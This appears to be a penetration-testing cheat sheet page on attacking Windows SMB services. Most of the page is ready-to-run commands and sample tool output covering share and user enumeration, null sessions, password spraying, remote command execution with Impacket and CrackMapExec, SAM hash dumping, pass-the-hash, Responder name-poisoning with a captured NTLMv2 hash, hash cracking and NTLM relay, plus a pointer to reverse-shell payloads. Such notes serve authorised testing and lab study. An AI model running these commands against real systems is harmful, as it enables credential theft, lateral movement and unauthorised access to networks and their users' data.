SMB (137,138,139,445)

OS Discovery using smb

nmap --script smb-os-discovery.nse -p445 10.10.10.40

Enumerate Hostnames

nmblookup -A $ip

List Shares

smbmap -H $ip
smbmap -H $ip -u alex -p lol123\!mD

smbclient -N -L \\\\$ip

nmap --script smb-enum-shares -p 139,445 $ip

Null Sessions

Using smbmap

smbmap -H $ip

Using rcpclient (port 139(?))

rpcclient -U "" -N $ip

Using smbclient

smbclient \\\\$ip\$sharename
smbclient \\\\$ip\$sharename -U username%password #authenticated

Using crackmapexec

crackmapexec smb 192.168.10.1 -u "" -p ""

Vuln Checking or use -sC for default scripts

nmap --script smb-vuln* -p 139,445 $ip

Scanning

Without username/password

enum4linux -a $ip

With username/password

enum4linux -u 'guest' -p '' -a $ip

Misconfigurations

Anonymous Authentication

Null session (refer above). Can use smbmap, smbclient, enum4linux, and rpcclient

Listing File Shares

$ smbclient -N -L //10.129.14.128

$ smbmap -H 10.129.14.128
$ smbmap -H 10.129.14.128 -r notes # -r (recursive) to browse directories

Downloading and Uploading Files

$ smbmap -H 10.129.14.128 --download "notes\note.txt"

$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

RPC Client (enumerate users)

$ rpcclient -U'%' 10.10.110.17

rpcclient $> enumdomusers

user:[mhope] rid:[0x641]

Protocol Specific Attacks

Password Bruteforce and Spray Attacks

$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

--continue-on-success to continue even after successful attempt

--local-auth if targeting a non domain joined computer

Remote Code Execution

Impacket PsExec - Python PsExec like functionality example using RemComSvc.
Impacket SMBExec - A similar approach to PsExec without using RemComSvc. This is useful when the target machine does NOT have a writeable share available.
Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
CrackMapExec - includes an implementation of smbexec and atexec.
Metasploit PsExec - Ruby PsExec implementation.

Impacket PsExec, SMBSexec, and atexec

$ impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

-x for commands and -X for powershell commands

uses --exec-method atexec by default

Extract Hashes from SAM database

$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Enumerating Logged on Users

$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Pass the Hash

$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Authentication Attacks (Responder)

Setup a fake SMB server to capture the NetNTLM v1/v2 hash

When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host's IP address by its hostname.

The hostname file share's IP address is required.
The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.
If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.
Is there no local DNS record? A query will be sent to the DNS server that has been configured.
If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.

$ sudo responder -I eth0

                                         __               
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|              

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0
               
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
<SNIP>
[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:XXXXXX

Cracking the NTLM Hash

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

If can't crack the password, relay it impacket-ntlmrelayx or MultiRelay.py

$ cat /etc/responder/Responder.conf | grep 'SMB = Off'
$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 # will dump SAM database

use -c to pass commands like a powershell reverse shell from https://www.revshells.com/

For RPC

Change a user's password.
Create a new domain user.
Create a new shared folder.

PreviousXXE NextInteracting with SMB

Last updated 1 year ago

hashtagOS Discovery using smb

hashtagEnumerate Hostnames

hashtagList Shares

hashtagNull Sessions

hashtagVuln Checking or use -sC for default scripts

hashtagScanning

hashtagMisconfigurations

hashtagAnonymous Authentication

hashtagListing File Shares

hashtagDownloading and Uploading Files

hashtagRPC Client (enumerate users)

hashtag

hashtagProtocol Specific Attacks

hashtagPassword Bruteforce and Spray Attacks

hashtagRemote Code Execution

hashtagImpacket PsExec, SMBSexec, and atexec

hashtagCrackMapExec

hashtagExtract Hashes from SAM database

hashtagEnumerating Logged on Users

hashtagPass the Hash

hashtagForced Authentication Attacks (Responder)

hashtagCracking the NTLM Hash

hashtagFor RPC